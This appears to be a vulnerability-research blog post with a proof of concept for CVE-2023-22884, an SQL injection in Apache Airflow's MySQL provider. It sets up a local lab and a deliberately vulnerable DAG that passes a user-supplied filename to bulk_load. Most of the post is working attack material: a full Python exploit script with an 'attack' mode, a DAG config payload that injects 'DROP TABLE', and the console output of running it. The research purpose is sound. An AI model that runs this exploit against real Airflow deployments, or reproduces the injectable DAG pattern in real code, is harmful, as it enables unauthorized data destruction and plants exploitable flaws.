SQL injection in Apache Airflow MySQL provider (CVE-2023–22884) — PoC + exploit

vsociety
14 min readAug 14, 2023

Summary

Proof of Concept for CVE-2023–22884 that is an Apache Airflow SQL injection vulnerability.

general

1 # @jakabakos
2 # version: 1.1
3 # Tested with Airflow 2.5.0 and MySQL provider 3.4.0
4 # Apache Airflow REST API reference: https://airflow.apache.org/docs/apache-airflow/stable/stable-rest-api-ref.html
5
6 import argparse
7 import json
8 import re
9 import requests
10 from packaging import version
11
12 def get_csrf_token(url):
13 """Get the CSRF token from the login page response"""
14 # Send a GET request to the login page to retrieve the HTML content
15 response = requests.get(url + "/login/")
16
17 # Use regular expression to find the CSRF token from the response HTML
18 pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
19 csrf_token = re.search(pattern, response.text)
20
21 # Extract the initial session cookie from the response
22 initial_session_cookie = response.cookies.get('session')
23
24 # Check if CSRF token is found in the response and return the session cookie and the token
25 if csrf_token:
26 print("[+] CSRF token found.")
27 return initial_session_cookie, csrf_token.group(1)
28 else:
29 # If CSRF token is not found, print an error message and exit the script
30 print("[-] CSRF token not found. Exiting...")
31 exit(1)
32
33 def login(url, username, password, cookie, csrf_token):
34 """Login to the Apache Airflow web application"""
35 # Prepare the login data with CSRF token, username, and password
36 data = {"csrf_token": csrf_token, "username": username, "password": password}
37
38 # Send a POST request to the login page with the login data and session cookie
39 response = requests.post(
40 url + "/login/",
41 headers={
42 "Content-Type": "application/x-www-form-urlencoded",
43 "Cookie": f"session={cookie}"
44 },
45 data=data
46 )
47
48 # Check if the login was successful or if there was an error
49 if "Invalid login. Please try again." in response.text:
50 print("[+] Login was not successful due to invalid credentials.")
51 exit(1)
52 elif response.status_code != 200:
53 print("[-] Something went wrong with the login process.")
54 elif "Set-Cookie" in response.headers:
55 # If login was successful, extract the new session cookie from the response headers
56 session_cookie = response.headers["Set-Cookie"].split(";")[0].split("=")[1]
57 print(f"[+] Login was successful. Captured session cookie: {session_cookie}")
58 return session_cookie
59
60 def verify_airflow_version(url, session_cookie):
61 """Verify the version of Apache Airflow and check for vulnerability"""
62 # Send a GET request to the Airflow home page to retrieve the HTML content
63 response = requests.get(
64 url + "/home",
65 headers={"Cookie": f"session={session_cookie}"}
66 )
67
68 # Use regular expression to find the version string from the response HTML
69 version_str = re.search(r'v(\d+\.\d+\.\d+)', response.text)
70
71 # Check if the version string is found in the response and extract the version number
72 if version_str:
73 print(f"[+] Airflow version found: {version_str.group(1)}")
74 else:
75 # If version string is not found, print an error message and exit the script
76 print("[-] Airflow version not found.")
77 exit(1)
78
79 # Check if the version is vulnerable (less than or equal to 2.5.0)
80 if version.parse(version_str.group(1)) <= version.parse("2.5.0"):
81 print("[+] Version is vulnerable.")
82 else:
83 print("[-] Airflow version is not vulnerable. Version is above 2.5.0. Exiting...")
84 exit(1)
85
86 def verify_mysql_provider(url, session_cookie):
87 """Verify the version of MySQL provider and check for vulnerability"""
88 # Send a GET request to get the list of providers from the Airflow API
89 response = requests.get(
90 f'{url}/api/v1/providers',
91 headers={"Cookie": f"session={session_cookie}"}
92 )
93 data = response.json()
94 providers = data.get("providers", [])
95
96 # Loop through the list of providers and find the MySQL provider
97 for provider in providers:
98 if provider.get("package_name") == "apache-airflow-providers-mysql":
99 # Check if the version of the MySQL provider is vulnerable (less than or equal to 3.4.0)
100 if version.parse(provider.get("version")) <= version.parse("3.4.0"):
101 print("[+] MySQL provider version is vulnerable.")
102 return
103 else:
104 print("[-] MySQL provider version is not vulnerable. Exiting...")
105 exit(1)
106
107 # If MySQL provider is not found in the list of providers, print an error message and exit the script
108 print("[-] MySQL provider not found. Exiting...")
109 exit(1)
110
111 def verify_connection_id(url, session_cookie, connection_id):
112 """Verify the existence of a provided connection ID or create a new connection using provided JSON data"""
113 # Check if the provided connection ID is a string, indicating an existing connection
114 if isinstance(connection_id, str):
115 # Send a GET request to get the list of connections from the Airflow API
116 response = requests.get(
117 f'{url}/api/v1/connections',
118 headers={"Cookie": f"session={session_cookie}"}
119 )
120 connections = response.json().get("connections", [])
121
122 # Loop through the list of connections and check if the provided connection ID exists
123 found = False
124 for conn in connections:
125 if conn.get("connection_id") == connection_id:
126 # Check if the existing connection is of type "mysql"
127 if conn.get("conn_type") == "mysql":
128 found = True
129 else:
130 print("[-] The provided connection_id is not a 'mysql' type connection. Exiting...")
131 exit(1)
132 if found:
133 print(f"[+] Connection ID '{connection_id}' exists.")
134 return
135 else:
136 print("[-] Submitted connection id does not exist. Exiting...")
137 exit(1)
138
139 # If the connection ID does not exist, try to open it as a JSON file that contains the data for the new connection
140 else:
141 try:
142 with open(connection_id, 'r') as f:
143 conn_data = json.load(f)
144 if not isinstance(conn_data, dict) or not all(key in conn_data for key in ["connection_id", "conn_type", "host", "login", "port", "password"]):
145 print("[-] Invalid JSON format for connection data. Exiting...")
146 exit(1)
147 # Send a POST request to create a new connection using the provided JSON data
148 response = requests.post(
149 url + "/connections",
150 headers={"Cookie": f"session={session_cookie}"},
151 json=conn_data
152 )
153
154 # Check if the connection was successfully created or if there was an error
155 if response.status_code == 200:
156 print(f"[+] Connection was successfully created with name {conn_data['connection_id']}.")
157 print("[+] This connection id should be used by the vulnerable DAG.")
158 else:
159 print("[-] Failed to create the connection. Exiting...")
160 exit(1)
161 except FileNotFoundError:
162 print("[-] The specified connection data file was not found. Exiting...")
163 exit(1)
164 except json.JSONDecodeError:
165 print("[-] Failed to parse the JSON connection data. Exiting...")
166 exit(1)
167
168 def verify_dag_id(url, session_cookie, dag_id):
169 """Verify the existence of a provided DAG ID"""
170 # Send a GET request to get the list of DAGs from the Airflow API
171 response = requests.get(f'{url}/api/v1/dags',
172 headers={"Cookie": f"session={session_cookie}"}
173 )
174
175 dags = response.json().get("dags", [])
176
177 # Check if the provided DAG ID exists in the list of DAGs
178 if any(dag.get("dag_id") == dag_id for dag in dags):
179 print(f"[+] DAG id '{dag_id}' exists.")
180 else:
181 print("[-] DAG id does not exist. Exiting...")
182 exit(1)
183
184 def trigger_dag(url, session_cookie, dag_id, file_path):
185 """Trigger a DAG run with a provided configuration"""
186 endpoint = f"{url}/api/v1/dags/{dag_id}/dagRuns"
187 headers = {
188 "Cookie": f"session={session_cookie}",
189 "accept": "application/json"
190 }
191
192 try:
193 # Read the content of the provided file (should be in JSON format)
194 with open(file_path, 'r') as file:
195 file_content = file.read()
196 try:
197 # Try to parse the JSON content into a Python dictionary
198 payload = json.loads(file_content)
199 except json.JSONDecodeError:
200 # If the provided file content is not valid JSON, exit the script
201 exit(0)
202 except FileNotFoundError:
203 # If the provided file path does not exist, print an error message and return None
204 print("File not found.")
205 return None
206
207 # Prepare the payload for the DAG run with the provided configuration
208 data = {"conf": payload}
209
210 # Send a POST request to trigger the DAG run with the payload configuration
211 response = requests.post(endpoint, headers=headers, json=data)
212
213 # Check if the DAG run was successfully triggered and if it's in "queued" state
214 if response.status_code == 200 and response.json().get("state") == "queued":
215 print("[+] DAG successfully triggered with the provided payload.")
216 else:
217 print("[-] Failed to trigger the DAG. Response:")
218 print(json.dumps(response.json(), indent=4))
219 exit(1)
220
221 def main():
222 # Example text to show usage examples of the script
223 example_text = '''Examples:
224 python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
225 python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
226 '''
227 parser = argparse.ArgumentParser(
228 description="CVE-2023-22884 Apache Airflow SQLi exploit script",
229 epilog=example_text,
230 formatter_class=argparse.RawDescriptionHelpFormatter
231 )
232
233 # Define command-line arguments for the script
234 parser.add_argument("-u", "--username", help="Airflow username.")
235 parser.add_argument("-p", "--password", help="Airflow password.")
236 parser.add_argument("-c", "--cookie", help="Authentication cookie.")
237 parser.add_argument("--host", required=True, help="Host where the airflow is (format: http(s)://host:port).")
238 parser.add_argument("-m", "--mode", required=True, choices=["test", "attack"], help="The mode of the script. Can be: 'test' or 'attack' mode")
239 parser.add_argument("-ci", "--connection-id", help="The connection ID of the MySQL provider. Required in attack mode only. Submit a string if it's existing or a path to a JSON file if should be created.")
240 parser.add_argument("-di", "--dag-id", help="The ID of the DAG to be exploited. Required in attack mode only.")
241 parser.add_argument("-dc", "--dag-config-file", help="Path to a file that stores a the DAG config JSON.")
242
243 args = parser.parse_args()
244
245 # Check if either username and password or the authentication cookie is provided
246 if (args.username and args.password) or args.cookie:
247 url = args.host.rstrip("/")
248 # Check if the URL starts with 'http://' or 'https://' and correct it if needed
249 if not url.startswith("http"):
250 print("[-] Invalid URL format. Please use 'http' or 'https' as the schema. Exiting...")
251 exit(1)
252
253 # Get the session cookie if not provided, by performing login using credentials and CSRF token
254 session_cookie = args.cookie
255 if not session_cookie:
256 initial_session_cookie, csrf_token = get_csrf_token(url)
257 session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)
258
259 if args.mode == "test":
260 print("[+] Running in test mode.")
261 # Verify the version of Apache Airflow and check for vulnerability
262 verify_airflow_version(url, session_cookie)
263
264 # Verify the version of MySQL provider and check for vulnerability
265 verify_mysql_provider(url, session_cookie)
266
267 # Verify the existence of the provided MySQL connection ID
268 verify_connection_id(url, session_cookie, args.connection_id)
269
270 # Verify the existence of the provided DAG ID
271 verify_dag_id(url, session_cookie, args.dag_id)
272
273 print("[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.")
274 exit(0)
275
276 elif args.mode == "attack":
277 print("[+] Running in attack mode.")
278 # Trigger the DAG run with the provided configuration
279 trigger_dag(url, session_cookie, args.dag_id, args.dag_config_file)
280 print("[+] Exploit successfully finished in attack mode.")
281 else:
282 # If neither credentials nor authentication cookie is provided, print an error message and exit the script
283 print("[-] Either username along with password or the authentication cookie is required. Exiting...")
284 exit(1)
285
286 if __name__ == "__main__":
287 main()

Description

Set up the PoC app

Install Docker and Docker Compose

Follow these instructions:

Install MySQL

To get a MySQL 8 server, follow this writeup:

sudo apt update && sudo apt -y  install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server

One has to explicitly enable LOAD DATA INFILE functionality in MySQL by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf. Add this code to the bottom of the file:

[mysqld]
secure-file-priv = ""

Confirm if MySQL 8.0 was installed as expected:

mysql -u root -p

After passing the password you should see your MySQL console:

Let’s create a table for testing purposes:

CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));

Install, configure, and run Airflow

We want to run Airflow in Docker with a local MySQL server we own.

This docker compose file seems to work but because the affected Airflow version is using a higher MySQL provider package we have to write our custom install command into a Dockerfile. You can find both files here.

Download the file:

curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'

Then, uncomment the “build ." line in the docker-compose.yml:

---
version: '3'
x-airflow-common:
&airflow-common
# In order to add custom dependencies or upgrade provider packages you can use your extended image.
# Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
# and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
build: . # UNCOMMENTED LINE HERE
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
# For backward compatibility, with Airflow <2.3
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
_PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
volumes:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
user: "${AIRFLOW_UID:-50000}:0"
depends_on:
&airflow-common-depends-on
redis:
condition: service_healthy
postgres:
condition: service_healthy
[REDACTED]

And also add the install command to a Dockerfile located in the same folder as the docker-compose.yaml file.

FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0

Additionally, we have to initialize the Airflow environment. As the official tutorial says, “On Linux, the quick-start needs to know your host user id and needs to have group id set to 0. Otherwise, the files created in dags, logs and plugins will be created with root user ownership." So run the following commands:

mkdir  -p  ./dags  ./logs  ./plugins  ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env

Don’t forget to Initialize the database with docker compose up airflow-init.

And now build and run the Airflow:

docker-compose up --build

As a result, you should see in the logs that the webserver and other components are up and there is a login form under localhost:8080:

The default username and password is airflow.

As a final step here we can check whether the installation of the vulnerable provider version was successful or not with this one-liner:

docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"

The output should be apache-airflow-providers-mysql==3.4.0.

As a next step, set up a connection for testing purposes under Admin / Connections menu.

Fill in the necessary data to connect to our local MySQL server:

  • Connection Id: mysql
  • Connection type: MySQL
  • Host: localhost
  • Shema: airflow
  • Login: root (can be any other user based on your MySQL configuration)
  • Password: password to connect to MySQL server
  • Port: 3306
  • Extra: {"local_infile": true}

Lastly, unpause the “bulk_load_from_file" DAG from the list.

Set up a DAG

The vulnerable code segment is in the MySQL provider’s bulk_load method, so we need a DAG that is using this method. Let's create one for the proof of concept.

Example DAG that is calling the vulnerable method. This Airflow DAG, named “bulk_load_from_file,” is designed to bulk load data from a file into a MySQL database.

from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook

def get_file_name():
"""Get the user-supplied filename to load into the database from the context"""
context = get_current_context()
return context["params"].get("filename", "test_file")
def get_table_name():
"""Get the user-supplied table name"""
context = get_current_context()
return context["params"].get("table_name", "test_table")
def bulk_load_sql(**kwargs):
"""Call the hook's bulk_load method to load the file content into the database"""
conn = MySqlHook(mysql_conn_id='mysql')
get_filename = get_file_name()
get_tablename = get_table_name()
conn.bulk_load(table=get_tablename, tmp_file=get_filename)
"""Define the DAG"""
dag = DAG(
"bulk_load_from_file",
start_date=datetime(2023, 7, 1),
schedule_interval=None)
"""Define the operator that calls the method to bulk load"""
t1 = PythonOperator(
task_id='bulk_load',
provide_context=True,
python_callable=bulk_load_sql,
dag=dag)
"""Call the operator"""
t1

A high-level overview of the file:

  • get_file_name() and get_table_name() are Python functions defined to retrieve user-supplied parameters "filename" and "table_name" from the context using get_current_context(). If the parameters are not provided, the default values "test_file" and "test_table" are used, respectively.
  • bulk_load_sql(**kwargs) is a Python function that serves as the core task. It uses MySQLHook to establish a connection to the MySQL database with the connection ID "mysql" (assuming it's defined in the Airflow connections). It then calls the bulk_load() method of the MySQLHook, passing the table name obtained from get_table_name() and the filename obtained from get_file_name() to load the content of the file into the specified database table. The injection point is the filename parameter coming from the context.
  • t1 is a PythonOperator that calls bulk_load_sql function that is to be executed when this task is triggered.

Exploitation

See the options of the exploit running with -h.

kali# python3 exploit.py -h
usage: exploit.py [-h] [-u USERNAME] [-p PASSWORD] [-c COOKIE] --host HOST -m {test,attack} [-ci CONNECTION_ID] [-di DAG_ID] [-dc DAG_CONFIG_FILE]
CVE-2023-22884 Apache Airflow SQLi exploit script
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Airflow username.
-p PASSWORD, --password PASSWORD
Airflow password.
-c COOKIE, --cookie COOKIE
Authentication cookie.
--host HOST Host where the airflow is (format: http(s)://host:port).
-m {test,attack}, --mode {test,attack}
The mode of the script. Can be: 'test' or 'attack' mode
-ci CONNECTION_ID, --connection-id CONNECTION_ID
The connection ID of the MySQL provider. Required in attack mode only. Submit a string if it's existing or a path to a JSON file if
should be created.
-di DAG_ID, --dag-id DAG_ID
The ID of the DAG to be exploited. Required in attack mode only.
-dc DAG_CONFIG_FILE, --dag-config-file DAG_CONFIG_FILE
Path to a file that stores a the DAG config JSON.
Examples:
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json

Test mode

Let’s run our script in test mode first:

kali# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
[+] CSRF token found.
[+] Login was successful. Captured session cookie: 64a9c813-e006-43e0-9c86-5877d0114491.2TxBJcJw4gH_JBVed5An6Qyu5Bc
[+] Running in test mode.
[+] Airflow version found: 2.5.0
[+] Version is vulnerable.
[+] MySQL provider version is vulnerable.
[+] Connection ID '{connection_id}' exists.
[+] DAG id 'bulk_load_from_file' exists.
[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.

Attack mode

Then, in attack mode.

Check the MySQL table Airflow’s table first:

Create a dag_config.json that will be attached as a JSON config file to the DAG trigger. The malicious code injection is in the filename part:

dag_config.json:

{
"filename": "/tmp/test_file' INTO TABLE test; DROP TABLE test; --",
"table_name": "test"
}

Then, run the script in attack mode:

#  python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
[+] CSRF token found.
[+] Login was successful. Captured session cookie: c0ffe971-a21a-459d-be71-e938742ebbb2.e80LLzIs5n2PvttPfJIHBPjgIrc
[+] Running in attack mode.
[+] DAG successfully triggered with the provided payload.
[+] Exploit successfully finished in attack mode.

Wait a couple of seconds and then check if the exploit payload was successfully executed:

Tadaaam!

Flowchart diagram

Join vsociety: https://vsociety.io/
Checkout our discord: https://discord.gg/sHJtMteYHQ

--

--

vsociety

vsociety is a community centered around vulnerability research